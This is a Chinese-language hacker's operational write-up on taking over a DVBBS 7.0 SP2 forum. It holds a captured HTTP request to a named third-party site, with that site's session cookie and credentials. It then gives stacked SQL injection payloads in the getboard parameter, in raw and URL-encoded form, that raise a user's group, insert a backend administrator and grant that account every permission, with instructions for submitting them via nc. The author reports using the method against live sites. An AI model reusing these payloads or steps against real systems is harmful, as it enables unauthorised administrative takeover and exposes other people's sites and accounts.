快考试了,所以也没时间看代码,只知道大约在哪里存在漏洞,哈哈!这里只是测试手记,当然是操作性比较强啦!

?

首先,我测试的都是DVBBS 7.0 SP2 ,ACCESS的话,进不了后台,因为不支持多语句查询,SQL的话则可以进后台并可能拿到Webshell.这里就拿SQL版的测试啦!

Powered By ：Dvbbs Version 7.0.0 Sp2 sql
Copyright ?2002 - 2005 Aspsky.Net
执行时间：46.87500毫秒。查询数据库3次。
当前模板样式：[默认模板]??

首先注册一个账号,然后修改头像并抓包,再修改数据包提交就OK!因为这个漏洞的利用工具有人写出来了,就直接拿工具吧,因为下面的都得手工操作!

...........省略一些细节,已经得到前台管理员权限!

接下来利用另一个漏洞,拿后台啦!

1.先发个贴固顶或者固顶一个贴(因为你现在是前台管理员)并抓包

POST /admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.hlhzw.com/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: www.hlhzw.com
Content-Length: 138
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: www%2Ehlhzw%2Ecom%2F=UserID=560&usercookies=0&StatUserID=202109665984&userclass=%B9%DC%C0%ED%D4%B1&username=wskhaha&password=Y1tGw4j886XtB846&userhidden=2; ASPSESSIONIDSSSQBBQS=FDHLDMFCLJKIBPAKMDHMLDLA; upNum=0; Dvbbs=

istopaction=1&boardID=12&ID=362&title=&content=te&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=12&submit=%C8%B7%C8%CF%B2%D9%D7%F7

!

修改上面的数据包啦:
把getboard=12改为:12,12);update [dv_user] set usergroupid=1 where userid=202109665984;--

这里的 12就改为后面的12? USerid就是上面的ID号了!

转换代码如下:

%31%32%2C%31%32%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%30%32%31%30%39%36%36%35%39%38%34%3B%2D%2D

用UE读一下字节数210

所以修改数据包:Content-Length: 138 为138+210-2=346

修改好了用NC提交啦!

2.再加个后台管理员账号

12,12);insert into dv_admin (username,[password],adduser) values('xysky','49ba59abbe56e057','wskhaha');--

转换代码如下:

%31%32%2C%31%32%29%3B%69%6E%73%65%72%74%20%69%6E%74%6F%20%64%76%5F%61%64%6D%69%6E%20%28%75%73%65%72%6E%61%6D%65%2C%5B%70%61%73%73%77%6F%72%64%5D%2C%61%64%64%75%73%65%72%29%20%76%61%6C%75%65%73%D%D%A%28%27%78%79%73%6B%79%27%2C%27%34%39%62%61%35%39%61%62%62%65%35%36%65%30%35%37%27%2C%27%77%73%6B%68%61%68%61%27%29%3B%2D%2D

字节:138+321-2=457? 提交OK

3.赋权

12,12);update dv_admin set flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36' where username='xysky';--

转化:
%31%32%2C%31%32%29%3B%75%70%64%61%74%65%20%64%76%5F%61%64%6D%69%6E%20%73%65%74%20%D%D%A%66%6C%61%67%3D%27%31%2C%32%2C%33%2C%34%2C%35%2C%36%2C%37%2C%38%2C%39%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%2C%31%37%2C%31%38%2C%31%39%2C%32%30%2C%32%31%2C%32%32%2C%32%33%2C%32%34%2C%32%35%2C%32%36%2C%32%37%2C%32%38%2C%32%39%2C%33%30%2C%33%31%2C%33%32%2C%33%33%D%D%A%2C%33%34%2C%33%35%2C%33%36%27%20%77%68%65%72%65%20%75%73%65%72%6E%61%6D%65%3D%27%78%79%73%6B%79%27%3B%2D%2D

字节:486+138-2=622 OK 提交

4.进后台

很可惜都没有成功.我靠!刚才在华夏那里进了后台,这里出了点小错好像!

好了,就到这里,没时间,抓包提交修改这些不想多说,没什么技术!

最后:漏洞补丁已经出来,7.1版本还没有测试,等考试完再测试!